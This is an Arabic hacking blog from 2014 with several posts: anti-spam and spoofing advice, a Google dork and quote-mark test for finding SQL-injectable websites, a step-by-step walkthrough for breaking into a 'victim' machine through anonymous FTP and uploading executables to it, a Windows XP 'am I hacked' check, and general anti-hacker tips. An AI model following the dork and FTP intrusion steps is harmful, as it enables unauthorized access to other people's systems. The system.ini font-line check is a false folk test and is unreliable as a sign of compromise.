jeudi 27 mars 2014

Spam

بسم الله الرحمن الرحيم

كلنا أصبحنا نعرف ما هي هذه الرسائل و التي نسميها نحن باسم Spam عادة هذه الرسائل ترسل من قبل أشخاص هدفهم الاحتيال عليك أو سرقة معلومات عنك أو حتى سرقة حسابك و بهذه الطريقة هم يمارسون نوعا من أنواع الهندسة الاجتماعية ليحققوا هدفهم .  
لحظة قد تكون العديد من الرسائل الالكترونية التي تأتي الى بريدك الالكتروني لست من محتالين و لكن قد تكون إعلانات لشركات حقيقية و لكن عادة لا تكون مهتما لهذه الإعلانات بل انك تعتبرها غير مرغوبة و من هنا جاء الاسم .
تغزو هذه الرسائل بريدنا الالكتروني بكثرة و هي تشكل خطرا على معلوماتنا اذا قمنا بفتحها أو الضغط على الروابط التي بداخلها أو حتى الرد عليها لان ذلك قد يؤدي الى تبادل للرسائل بينك و بين مرسل هذه الرسالة و بالنتيجة يحتال عليك بطريقة أو بأخرى فمن الأفضل أن لا ترد عليها .
و لكن كيف نتعامل مع هذه الرسائل و هل من إجراءات يجب أن نتخذها لنحمي أنفسنا الوقوع في شباك هؤلاء الناس؟؟
نعم بكل تأكيد هنالك العديد من الطرق التي يمكنك أن تقوم بها لتحمي نفسك و لتحمي الآخرين أيضا من خطر هذه الرسائل .
أولا : يمكنك التحقق من هذه الرسالة :
و ذلك عن طريق التأكد من أن هذه الرسالة ليست رسالة احتيال (Spoofing) إن رسائل الاحتيال (Spoofing) هي الرسائل التي تصل إليك على أساس أنها مرسلة من قبل Email معين و لكنها في الحقيقة ليست من قبل هذا Email  هي من قبل شخص أخر بكل تأكيد و يمكنك التأكد من ذلك عن طريق التأكد من ال Header الخاص بالرسالة المرسلة إليك , عادة ما يمكنك مشاهدة ال Header عن طريق الضغط بالزر اليمين على الرسالة الواردة إليك و اختار الخيار الخاص بال Header للرسالة و يمكنك من خلال قراءة تلك المعلومات أن تعرف من هو مرسل الرسالة الحقيقي هل هو نفس الايميل الذي كان ظاهرا لك أم أن هنالك شخص أخر (عادة ما يكون العنوان عنوان لشركة تقدم خدمة البريد المزيف الSpoofing) و للأسف هذه الشركات و المواقع أصبحت كثيرة على شبكة الانترنت و يمكنك من خلالها إرسال رسائل باسم أي بريد الكتروني تريده .
يمكنك القراءة هنا أيضا لتعرف كيف يتم كشف معلومات مرسل الرسالة الأصلي و ذلك من خلال مقالة كتبتها سابقا :
ثانيا : تحوير العنوان :
يعني التغيير في شكل عنوان بريدك الالكتروني ؟؟ و ذلك لان هنالك الكثير من البرامج التي تعمل اليوم على جمع عناوين البريد الالكتروني من المواقع و يستخدم مثل هذه البرامج هؤلاء الناس الذين يريدون إرسال تلك الرسائل المزعجة إليك لذلك اعمل على تحوير عنوان بريدك الالكتروني ؟؟ و ذلك عن طريق و ضعة في صورة مثلا بدل كتابته حتى لا تستطيع هذه البرامج قراءة بريدك , و أيضا يمكنك كتابته بهذا الشكل :
Example at yahoo dot com
لاحظ أننا و ضعنا كلمة at بلا من الإشارة @ و وضعنا أيضا كلمة dot بدلا من النقطة .
على كل حال هو أحد الأساليب و يمكنك عمل أي طريقة تراها مناسبة
ثالثا : الإبلاغ عن هذه الرسائل :
يمكنك دائما على شبكة الانترنت بأن تبلغ عن أي مخالفة للقانون و ذلك بطرق مختلفة حسب المشكلة و حسب تلك المخالفة طبعا و لكن هنا يكون الموضوع بسيطا نوعا ما حيث أنه بعد معرفتك للعنوان الحقيقي الذي يرسل اليك تلك الرسائل المزعجة يمكنك أن تبلغ عنه ,, كيف يتم ذلك طبعا يتم عن طريق الاتصال بالشركة المزودة للخدمة البريد الالكتروني مثلا لو كانت الشركة المزودة للخدمة للشخص الذي يرسل اليك الرسائل المزعجة أو المزيفة هي hotmail.com أو yahoo.com أو غيرها قد يكون موقع عادة أي شخص يمكنه استخدام عنوان بريد يكون المزود له هو موقعه بشكل مباشر عرفنا الشركة الان كيف أعرف معلومات الاتصال مع الشركة أقول لك يمكنك الذهاب الى هذا الموقع :
و يمكنك أن تبحث على معلومات ال whois لأي موقع تريدة و سوف يعطيك في النتائج معلومات اتصال تمكنك من الاتصال بهذا الموقع و بذلك يمكنك التبليغ عن أي شخص يرسل لك مثل تلك الرسائل .

أتمنى أن تكونوا قد استفدتم من هذه المقالة و السلام عليكم و رحمة الله و بركاته .

mercredi 26 mars 2014

البحث عن المواقع المصابه بثغره SQL

في هذه التدوينة سوف اشرح لكم 


البحث عن المواقع المصابه بثغره 

SQL

وبأستخدام هذا الدورك
=INFO.PHP?ID
عندما تضع هذا الدورك في الكوكل وسوف يخرج لك نتائج عند ادخول على احد المواقع يجب عليك ان تضع بعد رابط الموقع هذه العلامه الموجوده بين القوسين ( " )
لكي تتأكد اذ كان الموقع مصاب ام لا تابع الشرح في الفيديو
في الدرس القادم انشاء الله سوف اشرح كيفيه استغلال 
هذه الثغره وكيفيه اختراق الموقع المصاب بها انشاء الله 


الشرح على موقع اليوتيوب 
 by DALI_Xhackeur

lundi 24 mars 2014

حماية جهازك


by dali_xhackeur
ﺍﻟﺴﻼﻡ ﻋﻠﻴﻜﻢ
ﻓﻘﻂ ﻟﻤﺴﺘﺨﺪﻣﻲ Windows
xp
ﻛﻴﻒ ﺗﻌﺮﻑ ﺇﺫﺍ ﻛﺎﻥ ﺟﻬﺎﺯﻙ
ﻣﺨﺘﺮﻗﺎً ﺃﻡ ﻻ ؟
ﺍﻓﺘﺢ ﻗﺎﺋﻤﺔ )Start ( ﻭﻣﻨﻬﺎ ﺍﺧﺘﺮ
ﺃﻣﺮ )Run (
ﺃﻛﺘﺐ ﺍﻟﺘﺎﻟﻲ:
system.ini
ﺛﻢ ﺍﺿﻐﻂ enter
ﺳﻮﻑ ﺗﻈﻬﺮ ﻟﻚ ﺻﻔﺤﺔ ﻣﻔﻜﺮﺓ
ﻭﺑﻬﺎ ﺍﻻﺳﻄﺮ ﺍﻟﺘﺎﻟﻴﺔ :
EGA80WOA.FON=EGA80850.FON
EGA40WOA.FON=EGA40850.FON
CGA80WOA.FON=CGA80850.FON
CGA40WOA.FON=CGA40850.FON
ﺍﺫﺍ ﻇﻬﺮ ﺭﻗﻢ 850
ﻓﻬﺬﺍ ﻳﻌﻨﻲ ﺑﺎﻥ ﺟﻬﺎﺯﻙ ﺳﻠﻴﻢ
100/100 ﻭﻟﻢ ﻳﺘﻢ ﺍﺧﺘﺮﺍﻗﻪ .
ﺃﻣﺎ ﺃﺫﺍ ﻇﻬﺮ ﻟﻚ WOA
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
ﻳﻌﻨﻲ ﺟﻬﺎﺯﻙ ﻓﻴﻪ ﻣﻠﻔﺎﺕ
ﺗﺠﺴﺲ ﻭﻳﻤﻜﻦ ﺍﺧﺘﺮﺍﻗﻪ
ﺑﺴﻬﻮﻟﺔ .

ﺍﻻﺧﺘﺮﺍﻕ ﻋﻦ ﻃﺮﻳﻖ ﺍﻟﺪﻭﺱ

ﻟﺴﻼﻡ ﻋﻠﻴﻜﻢ
ﻫﺸﺮﺡ ﻟﻜﻢ ﺍﻟﻴﻮﻡ ﺍﻻﺧﺘﺮﺍﻕ ﻋﻦ
ﻃﺮﻳﻖ ﺍﻟﺪﻭﺱ...
ﻣﻠﺤﻮﻭﻭﻭﻭﻭﻭﻇﺔ ﻫﺎﺍﺍﺍﺍﺍﺍﺍﺍﺍﺍﺍﺍﺍ ﺍﺍﻣﺔ..
ﺍﻭﻻ ﻳﺠﺐ ﺃﻥ ﻳﻜﻮﻥ ﺍﻟﻀﺤﻴﺔ ﻓﺎﺗﺢ
ﺑﻮﺭﺕ20 ,ﺍﻟﺪﻭﺱ,ﻳﻜﻮﻥ ﺍﻟﻀﺤﻴﺔ
ﺷﺎﺑﻚ,,
ﻃﺒﻌﺎ ﻣﺶ ﻫﻌﺮﻑ ﺍﻋﻤﻞ ﺍﻟﺸﺮﺡ
ﺑﺎﻟﺼﻮﺭ,,ﻓﻜﺘﺒﺘﻪ ﻟﻜﻢ
===============
===============
ﺍﻟﺨﻄﻮﺓ ﺍﻻﻭﻟﻰ:ﻟﻨﺠﺎﺡ ﺍﻹﻗﺘﺤﺎﻡ ﻳﺠﺐ
ﻭﺍﻥ ﺗﻌﺮﻑ ﺍﻝIPﺗﺒﻌﻪ ﻭﺍﻥ ﻳﻜﻮﻥ
ﻟﺪﻯ ﺍﻟﻀﺤﻴﺔ ﺍﻟﺒﻮﺭﺕ21ﻣﻔﺘﻮﺡ ﻭ ﻫﻮ
ﺍﻟﺒﻮﺭﺕ ﺍﻟﺨﺎﺹ ﺑــFTP
ﻭﻟﺘﺄﻛﺪ ﻣﻦ ﺃﻥ ﺍﻟﺒﻮﺭﺕ ﻣﻔﺘﻮﺡ ﻋﻠﻴﻚ ﺍﻥ
ﺗﺴﺘﻌﻤﻞ ﺑﺮﺍﻣﺞ ﺍﻟﺴﻜﺎﻥ ﻭ ﻫﻲ ﻛﺜﻴﺮﺓ
ﺑﻌﺪﻣﺎ ﺗﺘﺄﻛﺪ ﺍﻥ ﺍﻟﺒﻮﺭﺕ ﻣﻔﺘﻮﺡ ﻧﻨﺘﻘﻞ
ﺍﻟﻰ
ﺍﻟﺨﻄﻮﺓ ﺍﻟﺜﺎﻧﻴﺔ ﻭ ﻫﻲ:
ﺇﺿﻐﻂ ﻋﻠﻰ
Start
ﺛﻢ
Run
ﺛﻢ ﺍﻛﺘﺐ
ftp –n
ﺗﻄﻠﻊ ﻟﻚ ﻧﺎﻓﺪﺓ ﻓﻲ ﺍﻟﺪﻭﺱ ﻣﻜﺘﻮﺏ
ﻋﻠﻴﻬﺎ
FTP>
ﻟﺤﺪ ﻫﻨﺎ ﻛﻞ ﺷﻲﺀ ﺗﻤﺎﻡ
ﻭ ﺑﻌﺪﻳﻦ ﺍﻛﺘﺐ
Open
ﺛﻢ ﺇﺿﻐﻂ ﻋﻠﻰ
ﺇﺩﺧﺎﻝ
Enter
ﺗﺘﺤﺼﻞ ﻋﻠﻰ ﺍﻟﻨﺘﻴﺠﺔ ﺍﻟﺘﺎﻟﻴﺔ
FTP>
To
ﺃﻛﺘﺐ ﺟﻨﺐ
To
ﺭﻗﻢIPﺍﻟﻀﺤﻴﺔ ﺛﻢ ﺇﺿﻐﻂ ﻋﻠﻰ
ﺇﺩﺧﺎﻝ
ﻭ ﺍﻟﺤﻴﻦ ﺍﻫﻢ ﺟﺰﺀ
ﺇﺩﺍ ﺗﺤﺼﻠﺖ ﻋﻠﻰ ﻫﺬﺍ ﺍﻟﺮﺩ ﻓﻘﺪ
ﺗﺨﻄﻴﺖ ﺧﻄﻮﺓ
Connected to
assassin.com/
220 w e bsrv1 Microsoft FTP
Service (Version 4.0 ).
ﻻ ﺗﻨﺴﻰ ﺗﺸﻴﻞ ﺍﻟﻤﺴﺎﺣﺔ ﺑﻴﻦw e b
ﻋﺸﺎﻥ ﺍﺫﺍ ﻣﺎ ﺣﻄﻴﻨﺎ ﺍﻟﻤﺴﺎﺣﺎﺕ ﻓﻲ
ﺍﻟﺪﻳﻒ ﺑﻮﻳﻨﺖ ﻳﺸﻔﺮﻫﺎ ﻟﺴﻼﻣﺘﻨﺎ ﻣﻦ
ﺍﻻﻛﻮﺍﺩ ﺍﻟﺨﺒﻴﺜﺔ ﻭﻣﺎ ﺷﺎﻓﻪ ﺫﻟﻚ
ﻭ ﺍﻵﻥ ﺃﻛﺘﺐ ﺍﻟﻜﺘﺎﺑﺔ ﺍﻟﺘﺎﻟﻴﺔ
ftp>quote user ftp
ﺇﺩﺍ ﺗﺤﺼﻠﺖ ﻋﻠﻰ ﻫﺬﺍ ﺍﻟﺮﺩ ﻓﻘﺪ
ﺗﺨﻄﻴﺖ ﺧﻄﻮﺓ
331Anonymous acces allowed,
send identify (e-mail name) as
.password
ﻭﺍﻵﻥ ﺃﻛﺘﺐ ﺍﻟﻜﺘﺎﺑﺔ ﺍﻟﺘﺎﻟﻴﺔ
ftp>quote cwd ~root
ﺇﺩﺍ ﺗﺤﺼﻠﺖ ﻋﻠﻰ ﻫﺬﺍ ﺍﻟﺮﺩ ﻓﻘﺪ
ﺗﺨﻄﻴﺖ ﺧﻄﻮﺓ
530Please login with USER and
PASS
ﺛﻢ ﺃﻛﺘﺐ ﺍﻟﻜﺘﺎﺑﺔ ﺍﻟﺘﺎﻟﻴﺔ
ftp>quote pass ftp
ﺇﺩﺍ ﺗﺤﺼﻠﺖ ﻋﻠﻰ ﻫﺬﺍ ﺍﻟﺮﺩ ﻓﻘﺪ
ﺗﺨﻄﻴﺖ ﺧﻄﻮﺓ
ﻭ ﻧﺠﺤﺖ ﻓﻲ ﺍﻹﻗﺘﺤﺎﻡ ﻳﻌﻨﻲ ﺍﻻﺧﺘﺮﺍﻕ
230Anonymous user logged
.in
ﻭﺍﻧﺖ ﺍﻻﻥ ﻓﻲ ﺟﻬﺎﺯ ﺍﻟﻀﺤﻴﻪ ﻣﺎ ﻋﻠﻴﻚ
ﺍﻻﺍﻥ ﺗﻘﻮﻡ ﺑﺈﺳﺘﻌﻤﺎﻝ ﻻﻭﺍﻣﺮ ﺍﻟﻔﺘﻴﺒﻲ
ﻭ ﻃﺒﻌﺎ ﻟﻦ ﺍﻣﺮ ﻋﻠﻴﻬﺎ ﻣﺮﻭﺭ ﺍﻟﻜﺮﺍﻡ
ﻟﻜﻲ ﻻ ﺗﻘﻌﻮﺍ ﻓﻲ ﺍﻟﻤﺸﻜﻠﺔ ﺍﻟﻲ
ﻭﻗﻌﺖ ﻓﻴﻬﺎ ﻭ ﻫﻲ ﻧﺠﺎﺡ ﺍﻹﻗﺘﺤﺎﻡ ﻣﻦ
ﺩﻭﻥ ﻣﺎ ﺃﻋﺮﻑ ﻭ ﻻ ﻓﻜﺮﺓ ﻋﻠﻰ ﺍﻭﺍﻣﺮ
ﺍﻟﻔﺘﻴﺒﻲ ﻭ ﺇﺫﺍ ﺍﺭﺩﺗﻢ ﺍﻥ ﺗﻀﺤﻜﻮﺍ ﺻﺎﺭ
ﻟﻲ ﺃﻛﺜﺮ ﻣﻦ20ﺩﻗﻴﻘﺔ ﻭ ﺍﻧﺎ ﻣﺠﻤﺪ
ﺍﻹﻳﺪﻱ ﻭ ﺍﻟﻀﺤﻴﺔ ﻋﺎﻟﻘﺔ ﻣﻦ ﺩﻭﻥ ﺃﻥ
ﺃﻋﻤﻞ ﺃﻱ ﺷﻲﺀ ﻭﻋﺸﺎﻥ ﻛﺬﺍ
ﻗﻤﺖ ﻭﺟﺒﺖ ﺍﻻﻭﺍﻣﺮﻋﺸﺎﻥ ﺗﻄﺒﻘﻮﻫﺎ
ﻣﺒﺎﺷﺮﺓﺍ ﺑﻌﺪ ﻧﺠﺎﺡ ﺍﻻﺧﺘﺮﺍﻕ
Pwd
ﻟﻜﻲ ﺗﻌﺮﻑ ﻣﺎ ﻳﺤﺘﻮﻳﻪ ﺍﻟﻬﺎﺭﺩ ﺩﻳﺴﻚ
Cd
ﻹﻗﺘﺤﺎﻡ ﻣﺠﻠﺪ ﻣﺜﺎﻝ
Cd Mahmoud
ﻓﻲ ﻫﺪﺍ ﺍﻟﻤﺜﺎﻝ ﻗﻤﺖ ﺑﺈﻗﺘﺤﺎﻡ ﻣﺠﻠﺪ
ﺍﻟﻤﺴﻤﻰ ﺑﻤﺤﻤﻮﺩ
Ls
ﻟﻜﻲ ﻳﺘﻀﺢ ﻟﻚ ﻣﺤﺘﻮﻯ ﺍﻟﻤﺠﻠﺪ ﺃﻭ
ﺍﻟﻬﺎﺭﺩ ﺩﻳﺴﻚ
Get
ﻟﻜﻲ ﺗﺤﻤﻞ ﺍﻟﻰ ﺳﻄﺢ ﺍﻟﻤﻜﺘﺐ ﺑﺘﺎﻉ
ﺟﻬﺎﺯﻙ
ﻭﻋﻠﻰ ﺳﺒﻴﻞ ﺍﻟﻤﺜﺎﻝ
Mahmoud.exe
Put
Get
ﻳﻌﻨﻲ ﺍﻥ ﺗﺄﺧﺪ ﻣﻠﻒ ﻣﻦ ﺳﻄﺢ
ﺍﻟﻤﻜﺘﺐ ﺑﺘﺎﻉ ﺟﻬﺎﺯﻙ ﻭ ﺗﻀﻌﻪ ﻓﻲ
ﻓﻲ ﺟﻬﺎﺯ ﺍﻟﻀﺤﻴﺔ
ﻣﺜﺎﻝ
Elmasry.exe
Clos
ﻟﻘﻄﻊ ﺍﻹﺗﺼﺎﻝ ﻣﻊ ﺍﻟﻀﺤﻴﺔ
ﺃﺧﻮﻛﻢ: #dali_xhack

حمي نفسك من الهاكرز نصائح ...

ﺃﻓﻀﻞ ﻃﺮﻳﻘﺔ ﻟﻠﺤﻤﺎﻳﺔ ﻣﻦ ﺍﻹﺧﺘﺮﺍﻗﺎﺕ
ﻭﺍﻟﻘﺮﺻﻨﺔ
ﻗﺒﻞ ﺍﻟﺤﺪﻳﺚ ﻋﻦ ﺣﻤﺎﻳﺔ ﺟﻬﺎﺯﻙ ، ﻳﺠﺐ
ﺃﻥ ﻧﺘﺬﻛﺮ ﺑﻌﺾ ﺍﻟﻨﻘﺎﻁ ﺍﻟﻤﻬﻤﺔ ﺍﻟﺘﻰ
ﺑﺪﻭﻧﻬﺎ ﻻ ﻓﺎﺋﺪﺓ ﻣﻦ ﺍﻟﺤﻤﺎﻳﺔ:
ﻭﺟﻮﺩ ﺑﺮﻧﺎﻣﺞ ﺣﻤﺎﻳﺔ ﻣﻦ ﻗﺮﺍﺻﻨﺔ
ﺍﻟﻜﻤﺒﻴﻮﺗﺮ ﺑﺠﻬﺎﺯﻙ، ﻻ ﻳﻌﻨﻲ ﻋﺪﻡ ﻗﺪﺭﺗﻬﻢ
ﻋﻠﻰ ﺍﺧﺘﺮﺍﻗﻪ· ﺇﺫﺍ ﺍﻋﺘﻘﺪﺕ ﺃﻥ ﻭﺟﻮﺩ ﻋﺪﺓ
ﺑﺮﺍﻣﺞ ﺣﻤﺎﻳﺔ ﺑﺠﻬﺎﺯﻙ ، ﻭﺗﻌﻤﻞ ﻓﻰ ﺁﻥ
ﻭﺍﺣﺪ ﺳﻮﻑ ﻳﺤﻤﻰ ﺟﻬﺎﺯﻙ ﻭ ﻳﺰﻳﺪ ﻣﻦ
ﻓﻌﺎﻟﻴﺔ ﺍﻟﺤﻤﺎﻳﺔ ﻓﺄﻧﺖ ﻣﺨﻄﻰﺀ ﺗﻤﺎﻣﺎ،
ﻷﻥ ﺫﻟﻚ ﻳﻀﻌﻒ ﻣﻦ ﺇﻣﻜﺎﻧﻴﺔ ﺍﻟﺤﻤﺎﻳﺔ
ﻋﻠﻰ ﺍﻟﺠﻬﺎﺯ·
ﻭﺇﺫﺍ ﻟﻢ ﺗﻜﻦ ﻣﺒﺎﻟﻴﺎ ﺑﻬﺆﻻﺀ ﺍﻟﻘﺮﺍﺻﻨﺔ
ﻣﻌﺘﻘﺪﺍ ﺃﻧﻪ ﻟﻴﺲ ﻓﻲ ﺟﻬﺎﺯﻙ ﺷﺊ ﺗﺨﺎﻑ
ﻋﻠﻴﻪ، ﻓﺄﻧﺖ ﻟﻢ ﺗﻔﻬﻢ ﻫﺪﻑ ﺍﻟﻘﺮﺍﺻﻨﺔ·
ﺍﻥ ﻫﺪﻑ 80 ﻓﻲ ﺍﻟﻤﺌﺔ ﻣﻦ ﺍﻟﻘﺮﺍﺻﻨﺔ
ﻫﻮ ﺍﻟﺤﺼﻮﻝ ﻋﻠﻰ ﺍﺷﺘﺮﺍﻛﻚ ﻭ ﺭﻗﻤﻚ
ﺍﻟﺴﺮﻱ ﻭﺑﺮﻳﺪﻙ ﺍﻹﻟﻜﺘﺮﻭﻧﻲ ﻭﺭﻗﻤﻪ
ﺍﻟﺴﺮﻱ ، ﻷﻫﺪﺍﻑ ﻛﺜﻴﺮﺓ ﻭﺧﻄﻴﺮﺓ ﺟﺪﺍ،
ﻣﻨﻬﺎ ﺍﻻﺑﺘﺰﺍﺯ ﻭﺍﻟﺘﺨﺮﻳﺐ ﺍﻟﺬﻯ ﻳﺘﻢ ﺑﺴﻬﻮﻟﺔ
ﻟﻮ ﺗﻢ ﺍﺧﺘﺮﺍﻕ ﺟﻬﺎﺯﻙ·
ﺃﻣﺎ ﺍﻟـ20 ﻓﻲ ﺍﻟﻤﺌﺔ ﺍﻟﺒﺎﻗﻮﻥ، ﻓﻬﺪﻓﻬﻢ
ﺍﻟﺮﺋﻴﺴﻰ ﻫﻮ ﺍﻟﺘﺠﺴﺲ ﻭﺍﻹﻃﻼﻉ ﻋﻠﻰ
ﻣﺤﺘﻮﻳﺎﺕ ﺟﻬﺎﺯﻙ ﻭﻣﻌﻠﻮﻣﺎﺗﻚ ﺍﻟﺸﺨﺼﻴﺔ
ﻭﺻﻮﺭﻙ ﺍﻟﺨﺎﺻﺔ، ﻭﺳﺤﺐ ﻣﻠﻔﺎﺕ ﺃﻭ
ﺑﺮﺍﻣﺞ، ﺃﻭ ﻣﺴﺤﻬﺎ ﻛﻠﻴﺎً ﻣﻦ ﺟﻬﺎﺯﻙ ﻭﻫﺬﻩ
ﺍﻟﻔﺌﺔ ﺗﻨﺪﺭﺝ ﺗﺤﺖ ﻣﺴﻤﻰ ﺍﻟﻬﻮﺍﺓ ﺃﻭ ﺍﻟﺬﻳﻦ
ﻳﺴﺘﻌﺮﺿﻮﻥ ﻋﻀﻼﺗﻬﻢ ﻋﻠﻰ ﺧﻠﻖ ﺍﻟﻠﻪ ·
ﻃﺮﻕ ﺍﻟﺤﻤﺎﻳﺔ
ﺇﺫﺍ ﻛﻨﺖ ﺗﺮﻳﺪ ﺍﻟﺤﻤﺎﻳﺔ، ﺍﺗﺒﻊ ﺍﻟﻄﺮﻕ
ﺍﻵﺗﻴﺔ :
ﺃﻭﻻً : ﻳﺠﺐ ﺍﻟﺘﺄﻛﺪ ﻣﻦ ﻋﺪﻡ ﻭﺟﻮﺩ
ﺗﺮﻭﺟﺎﻥ ﺑﺠﻬﺎﺯﻙ، ﻭﺍﻟﺘﺮﻭﺟﺎﻥ ﻫﻮ ﺧﺎﺩﻡ
ﻳﺴﻤﺢ ﻟﻠﻤﺨﺘﺮﻕ ﺑﺎﻟﺘﺤﻜﻢ ﺍﻟﻜﺎﻣﻞ ﻓﻰ
ﺟﻬﺎﺯﻙ، ﻭﻳﺘﻢ ﺯﺭﻋﻪ ﺑﺠﻬﺎﺯﻙ ﻋﻦ ﻃﺮﻳﻖ
ﺍﻟﻤﺨﺘﺮﻕ ﻭ ﺫﻟﻚ ﺑﺈﺭﺳﺎﻟﻪ ﺇﻟﻴﻚ ﻋﻦ
ﻃﺮﻳﻖ ﺑﺮﻳﺪﻙ ﺍﻹﻟﻜﺘﺮﻭﻧﻲ ﻣﺜﻼ ﺃﻭ ﻋﻦ
ﻃﺮﻳﻖ ﺑﺮﺍﻣﺞ ﺍﻟﺪﺭﺩﺷﺔ ﺍﻟﻔﻮﺭﻳﺔ ﻣﺜﻞ ICQ
ﺃﻭ ﻋﻦ ﻃﺮﻳﻖ ﻗﺮﺹ ﻣﺮﻥ، ﺃﻭ ﺗﻘﻮﻡ ﺃﻧﺖ
ﺑﺰﺭﻋﻪ ﻓﻰ ﺟﻬﺎﺯﻙ ﻋﻦ ﻃﺮﻳﻖ ﺍﻟﺨﻄﺄ
ﺑﺴﺒﺐ ﻋﺒﺜﻚ ﻓﻰ ﺑﺮﺍﻣﺞ ﺍﻻﺧﺘﺮﺍﻕ ·
ﻓﺘﻘﻮﻡ ﺑﻔﻚ ﺍﻟﺘﺮﻭﺟﺎﻥ ﻓﻲ ﺟﻬﺎﺯﻙ، ﺑﺪﻻ
ﻣﻦ ﺃﻥ ﺗﺮﺳﻠﻪ ﺇﻟﻰ ﺍﻟﺠﻬﺎﺯ ﺍﻟﻤﺮﺍﺩ
ﺍﺧﺘﺮﺍﻗﻪ ، ﻟﺬﻟﻚ ﺃﻧﺼﺤﻚ ﻋﺪﻡ ﺗﺤﻤﻴﻞ
ﻫﺬﻩ ﺍﻟﺒﺮﺍﻣﺞ ﻧﻬﺎﺋﻴﺎً ، ﻭﻟﻜﻲ ﻧﺘﺄﻛﺪ ﻣﺎ ﺍﺫﺍ
ﻛﺎﻥ ﺑﺠﻬﺎﺯﻙ ﺗﺮﻭﺟﺎﻥ ﺃﻡ ﻻ، ﻫﻨﺎﻙ ﻋﺪﺓ
ﻃﺮﻕ ﻣﺜﻞ ﺍﻟﺒﺤﺚ ﻓﻰ ﻣﻠﻒ ﺍﻟﺴﺠﻞ
Registry ﺭﻳﺠﺴﺘﺮﻱ ﺍﻟﺨﺎﺹ ﺑﺎﻟﻮﻧﺪﻭﺭﺯ،
ﻭﻷﻫﻤﻴﺔ ﺍﻟﺮﻳﺠﺴﺘﻴﺮﻱ ﻭﻟﺘﻔﺎﺩﻯ ﺣﺬﻓﻚ
ﺍﻟﻤﻠﻔﺎﺕ ﻋﻦ ﻃﺮﻳﻖ ﺍﻟﺨﻄﺄ ﺳﻮﻑ ﻧﺒﺤﺚ
ﻋﻦ ﺍﻟﺘﺮﻭﺟﺎﻥ ﺑﻄﺮﻳﻘﺔ ﺁﻣﻨﺔ ﻭ ﺫﻟﻚ
ﺑﺎﺳﺘﺨﺪﺍﻡ ﺑﺮﺍﻣﺞ ﺑﺎﺣﺜﺔ · ﺍﻟﺬﻱ ﻳﻌﺪ ﺃﻓﻀﻞ
ﺑﺮﻧﺎﻣﺞ Cleaner Theﻓﺈﺫﺍ ﻟﻢ ﻳﻜﻦ
ﻣﺘﻮﻓﺮﺍ ﻟﺪﻳﻚ، ﻗﻢ ﺑﺘﺤﻤﻴﻠﻪ ﻓﻮﺭﺍً ﻭﻫﻮ
ﺑﺮﻧﺎﻣﺞ http://www.moo/
soft.com/ download.php
ﺛﺎﻧﻴﺎً : ﻗﻢ ﺑﻌﻤﻞ ﺑﺤﺚ ﻋﻦ ﺍﻟﺘﺮﻭﺟﺎﻥ
ﺑﺎﻟﻀﻐﻂ ﻋﻠﻰ ﺯﺭ ﺑﺤﺚ ﺳﻜﺎﻥ Scan ﻭ
ﺑﻌﺪ ﺍﻻﻧﺘﻬﺎﺀ ﻣﻦ ﺍﻟﺒﺤﺚ ﻋﻠﻰ ﻗﺮﺻﻚ
ﺍﻟﺼﻠﺐ، ﺳﻴﺨﺒﺮﻙ ﺑﺮﻧﺎﻣﺞ ﺇﻥ ﻛﺎﻥ ﻳﻮﺟﺪ
ﻟﺪﻳﻚ ﺗﺮﻭﺟﺎﻥ ﻣﺰﺭﻭﻉ ﺑﺠﻬﺎﺯﻙ،
ﻭﺳﻴﻌﻄﻴﻚ ﺧﻴﺎﺭ ﺣﺬﻓﻪ ﺃﻭ ﻋﺪﻣﻪ ، ﻃﺒﻌﺎً
ﺇﺿﻐﻂ ﻋﻠﻰ ﺍﻟﻤﻮﺍﻓﻘﺔ ﻟﺤﺬﻓﻪ · ﺇﺫﺍ ﺇﻧﺘﻬﻰ
ﺍﻟﺒﺤﺚ ﻭ ﻇﻬﺮﺕ ﻧﺎﻓﺬﺓ ﺻﻐﻴﺮﺓ ﻣﻜﺘﻮﺏ
ﺑﻬﺎ scan complete ﻓﻬﺬﺍ ﻣﻌﻨﺎﻩ ﺃﻥ
ﺟﻬﺎﺯﻙ ﺧﺎﻝ ﻭ ﻧﻈﻴﻒ ﻣﻦ ﺍﻟﺘﺮﻭﺟﺎﻥ ·
ﺛﺎﻟﺜﺎً : ﻗﻢ ﺑﺘﺤﺪﻳﺚ ﺍﻟﺒﺮﻧﺎﻣﺞ ﺍﻟﻤﻜﺎﻓﺢ
ﻟﻠﻔﻴﺮﻭﺳﺎﺕ ﻟﺪﻳﻚ ﺩﺍﺋﻤﺎً ، ﻓﺒﺮﻧﺎﻣﺞ
ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﻳﻘﻮﻡ ﺃﺣﻴﺎﻧﺎً ﺑﻜﺸﻒ ﺍﻟﺘﺮﻭﺟﺎﻥ
ﻋﻨﺪ ﻓﺘﺤﻪ ﻋﻦ ﻃﺮﻳﻖ ﺗﺤﺪﻳﺚ ﺍﻟﺒﺮﻧﺎﻣﺞ
ﺍﻟﻤﻮﺟﻮﺩ ﻋﻠﻰ ﺟﻬﺎﺯﻙ ﻷﻥ ﻋﻤﻞ
UPDATE ﺑﺎﺳﺘﻤﺮﺍﺭ ﻣﻦ ﻋﻠﻰ ﺍﻹﻧﺘﺮﻧﺖ ·
ﻓﻴﻜﻮﻥ ﻗﺪ ﺗﻢ ﻭﺿﻊ ﺁﺧﺮ ﺇﺻﺪﺍﺭ ﻟﻬﺬﻩ
ﺍﻟﺒﺮﺍﻣﺞ ﺍﻟﻤﻜﺎﻓﺤﺔ ﻟﻠﻔﻴﺮﻭﺱ ﻭﺍﻟﺘﺮﻭﺟﺎﻥ
ﻣﻦ ﻋﻠﻰ ﺍﻟﻤﻮﻗﻊ ﺍﻟﺨﺎﺹ ﺑﺒﺮﻧﺎﻣﺞ
ﺍﻟﻤﻜﺎﻓﺤﺔ ﻭﻣﺪﻙ ﺃﻳﻀﺎً ﺑﺄﺣﺪﺍﺙ ﺃﺳﻤﺎﺀ
ﻟﻠﻔﻴﺮﻭﺳﺎﺕ ﻭﺍﻟﺘﺮﻭﺟﺎﻥ ﺍﻟﺬﻯ ﺃﻧﺼﺤﻚ
ﺩﺍﺋﻤﺎً ﺑﻌﻤﻞ UPDATE ﻟﻠﺒﺮﻧﺎﻣﺞ ﺍﻟﺨﺎﺹ
ﺑﻚ ﺑﺎﺳﺘﻤﺮﺍﺭ · ﻭﺃﻳﻀﺎً ﻣﻌﺮﻓﺔ ﺃﺣﺪﺙ
